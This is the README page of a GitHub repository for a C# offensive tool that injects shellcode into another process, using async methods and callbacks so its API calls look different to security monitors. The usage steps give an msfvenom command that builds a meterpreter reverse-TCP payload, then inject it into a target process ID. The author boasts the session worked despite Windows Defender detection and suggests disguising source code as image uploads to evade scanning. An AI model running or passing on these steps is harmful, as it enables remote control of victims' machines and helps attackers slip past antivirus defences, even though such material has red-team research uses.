Skip to content

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)

Notifications You must be signed in to change notification settings

DamonMohammadbagher/NativePayload_TiACBT

Repository files navigation

NativePayload_TiACBT

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)

Note: These C# Codes Tested by .Net Framework 3.5 or 4.0 & 4.5 only ;) & i will Publish Article for these codes soon , in these code we have Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique CBT, in these Codes We have "CreateRemoteThread or NtCreateThreadEx" BUT the goal is Changing Code Behavior for Calling API Functions (Remote Thread Injection only), as you can see in these Pictures With API Monitor tool you can see what happened step by step.

as you can see in the Picture3, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session ¯_(ツ)_/¯


Article: Remote Thread Injection + C# Async Method + CallBack Functions Technique (Changing Code Behavior) => https://damonmohammadbagher.github.io/Posts/05may2021x.html


C# Codes:

+    1. NativePayload_TiACBT.cs
+    2. NativePayload_TiACBT2.cs

you can upload your Code like "image/gif/png/jpeg" files instead "text" file, sometimes this is good idea to avoid using files directly as source code ;D , but still you need to upload source code with zip formats etc (with/without random pwd for each download) ;)

 1. NativePayload_TiACBT.png
 2. NativePayload_TiACBT2.png

  1. NativePayload_TiACBT.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA + EnumSystemLocalesA Native APIs)

Note: NativePayload_TiACBT will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread (all methods called via Async C# Method + Callback Functions ...)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_TiACBT.exe [mode 1,2] [TPID] [PAYLOAD]
example: NativePayload_TiACBT.exe 1 5930 "fc,48,00,87,00,...."
example: NativePayload_TiACBT.exe 2 5930 "fc,48,00,87,00,...."


  1. NativePayload_TiACBT2.cs (Remote Thread Injection + Calling Async C# Methods + Callback Functions Technique via EnumUILanguagesA Native API)

Note: NativePayload_TiACBT2 will call APIs: OpenProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx

Note: in this code Method1 (OpenProcess) will call Method2 (VirtualAllocEx) & Method2 Will Call Method3 (WriteProcessMemory) & Method3 Will call Method4 (NtCreateThreadEx) and all methods called via Async C# Method + Callback Functions ...

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_TiACBT2.exe   [TPID] [PAYLOAD]
example: NativePayload_TiACBT2.exe  4386 "fc,48,00,87,00,...."


Note: as you can see in the Picture, Code Behavior Detected by Windows Defender(update 2020/12/20) because of Payload for meterpreter BUT i had meterpreter Session ¯_(ツ)_/¯